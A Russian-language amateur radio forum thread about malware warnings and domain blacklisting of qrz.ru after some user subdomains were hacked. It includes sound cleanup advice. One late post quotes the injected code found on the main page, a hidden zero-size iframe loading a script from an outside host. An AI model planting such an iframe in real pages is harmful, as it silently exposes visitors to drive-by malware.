Вирусы на qrz.ru

[UX0IM]

А замеченная зараза на домашних страничках пользователей - это их забота

Их забота, а проблемы то ваши? Народ всполошился, неделями антивирями компы сканируют.

Добавлено через 5 минут

каждый день после захода делаю глубокую проверку всего компа разными антивирями...ничего!

Интернет ресурсы имеют свои антивири...обнаружили трояны на этом сайте и блокируют доступ к нему.Это забота о наших компах, и наши антивири пока курят в сторонке..отдыхают

[RC3C]

Парни, ну просветите "чайника" , захожу на сайт каждый день (бывает по нескольку раз), никаких проблем ..тьфу-тьфу , почему эта грязь к одним липнет, к другим нет? ОС- Виста, Опера, Eset Smart Security. Кстати, когда были проблемы на CQ.HAM, у меня тоже никаких проблем не возникло.

Видимо Опера не давала выполнить некий вирусный скрипт(программый код встроенный в тело сайта) после захода на сайт. Такое бывает.

[UA5AA]

...вот тока щаз сработал Аваст - блокировал подключение к QRZ-ту.Сделал быструю проверку Вебом, Каспером и Авастом - ничего ..."тихо".

[UA3FDS]

На QRZ в день раз по сто захожу, а всё никак не словлю ничего. Стоит XP SP3 со всеми обновлениями+Каспер6+Outpost Fireval Pro 2009. Браузер- IE7. Что хоть делать надо, чтобы увидеть то, что здесь обсуждается?
Или, я уже ужасно инфицирован, а об этом не знаю?

[RA6XTD]

А замеченная зараза на домашних страничках пользователей - это их забота.

Да нет, вы не правы.
Как раз из-за "их забот" ВЕСЬ домен qrz.ru попадает в черные списки.
Оттого куча неудобств пользователям.

Например тем, кто работает под Mozilla Firefox.

Добавлено через 1 минуту

На QRZ в день раз по сто захожу, а всё никак не словлю ничего

Дело в том, что заражены бывают поддомены 3-го уровня, сидящие на qrz.ru на которые вы не ходите.

[RX9CC]

Что хоть делать надо, чтобы увидеть то, что здесь обсуждается?

И я хочу, ну никак ничего плохого не вижу. Вот досадно то как.....

[RA6XTD]

Парни, ну просветите "чайника" , захожу на сайт каждый день (бывает по нескольку раз), никаких проблем ..тьфу-тьфу , почему эта грязь к одним липнет, к другим нет? ОС- Виста, Опера, Eset Smart Security. Кстати, когда были проблемы на CQ.HAM, у меня тоже никаких проблем не возникло.

Вы не путайте, когда ваш компьютре УЖЕ заразился и две другие ситуации:
- антивирус блокирует вредоносный код на html страничке
- доменное имя попало в черные списки различных сервисов в Интернете т.к. на сайтах поддоменов содержались странички с вредоносным кодом.

Вот сейчас ситуация последняя. Из-за влома некоторых поддоменов, сидящих на qrz.ru (типа ua9lak.qrz.ru) весь домен попал в черные списки. Поэтому браузеры типа Mozilla Firefox, Opera ругаются на любой поддомен домена qrz.ru как на ПОТЕНЦИАЛЬНО опасный. Что затрудняет работу.

Никто не говорит, что СЕЙЧАС зайдя на forum.qrz.ru можно что-то подхватить.

[UA3FDS]

Дело в том, что заражены бывают поддомены 3-го уровня, сидящие на qrz.ru на которые вы не ходите.

А как туда сходить, я в сетевых делах дуб?

[RA6XTD]

А как туда сходить, я в сетевых делах дуб?

Хочется проверить насколько ваш "секс" будет защищенным?

Спросите у тех, кто тут писал про ругань антивиров и брандмауэров во время посещения этих страничек. На какие именно поддомены они ходили.

[RT8L]

Проблема была замечена еще до открытия этой ветки форума.
Разбираемся.
Конструктивные предложения приветствуются.

А замеченная зараза на домашних страничках пользователей - это их забота.

Заходил с нескольких компов на QRZ.RU и во всех случаях идет предупреждение о наличии вируса на сайте. Так, что причина не в пользователях.

Надо бы навести порядок однако....

[R9LZ]

Надо бы навести порядок однако....

Спасибо что подсказал о необходимости действий, доложусь тебе первому.

[RA9JM]

ну что же админы то молчат?? давайте ребятки,занимайтесь уже делом!!!
даааа,не ожидал...банить,предупреждения там разные(по своему усмотрению!!!!!т.е. по своим законам непонятным) это вам полегче будет!!

А вот вам: "Лучше туда не ходить! :-)))))))))))
Я ( и куча народу) уже поимели проблемы с баннером сексуального характера!
Серега Илюхин UA9OTY в отпуске, и видать без него как без рук!
73! Александр Сухарев RO9O"

[RX3AGD]

А вот вам: "Лучше туда не ходить! :-)))))))))))
Я ( и куча народу) уже поимели проблемы с баннером сексуального характера!
Серега Илюхин UA9OTY в отпуске, и видать без него как без рук!
73! Александр Сухарев RO9O"

чаво сказать то хотели? смысел не понятен...

[RX3QFY]

Конструктивные предложения приветствуются.

На фтп к UA9LAK пустите? Помогу реально.

[4Z5LZ / RA9APZ]

Конструктивные предложения приветствуются.

Если требуются конструктивные предложения, то могу могу посоветовать один из методов выявления зараженных страниц (уверен, что 9OTY знает об этом, но может быть будет кому-то ещё полезно).

Итак, как я вижу, на главной странице qrz.ru до сих пор находится эксплоит < iframe src="http : // trfistc.info /for.cgi?009" width="0" height="0" style="visibility: hidden;" >< /iframe >. Сейчас он бездействует, т.к. адрес указанный выше выдаёт ERROR 403: Forbidden. Поэтому антивирусы прекратили "кричать", хотя в Google видят этот код и не снимают бан с домейна.
Видать хакеры приостановили свою черную деятельность. Но наверняка временно.

У меня когда-то были подобные проблемы с коммерческими сайтами. Я сделал следующее. Я не стал сразу удалять вредоносный код, а посмотрел на дату последнего изменения файла в котором находится хакерский код. Если файл не был изменён автором сайта после внедрения эксплоита, то по дате можно искать в логах веб сервера (а также ftp и ssh) кем был внесён этот код. По найденным данным (в частности по IP хакера) можно найти и другие пораженные страницы на сайте и вычистить их.

Труднее всего найти дырки, через которые хакеры пролезли, и если дыры не найдены, то необходимо поменять пароли к базе данных, ФТП и другим сервисам сайта, а также произвести апдейты программ типа форумов. Как правило, дыры находят в популярных программах с открытым кодом.

Кстати, надо убрать упоминания о серверных компонентах со страниц сайта. Так например, в HTML можно увидеть
"Powered by Apache 1.3.33 Unix web server + MySQL 4.1 server"
Кому это надо? Правильно, хакерам.

Добавлено через 2 минуты

На фтп к UA9LAK пустите? Помогу реально.

боюсь, ФТП будет недостаточно. см. мой коммент выше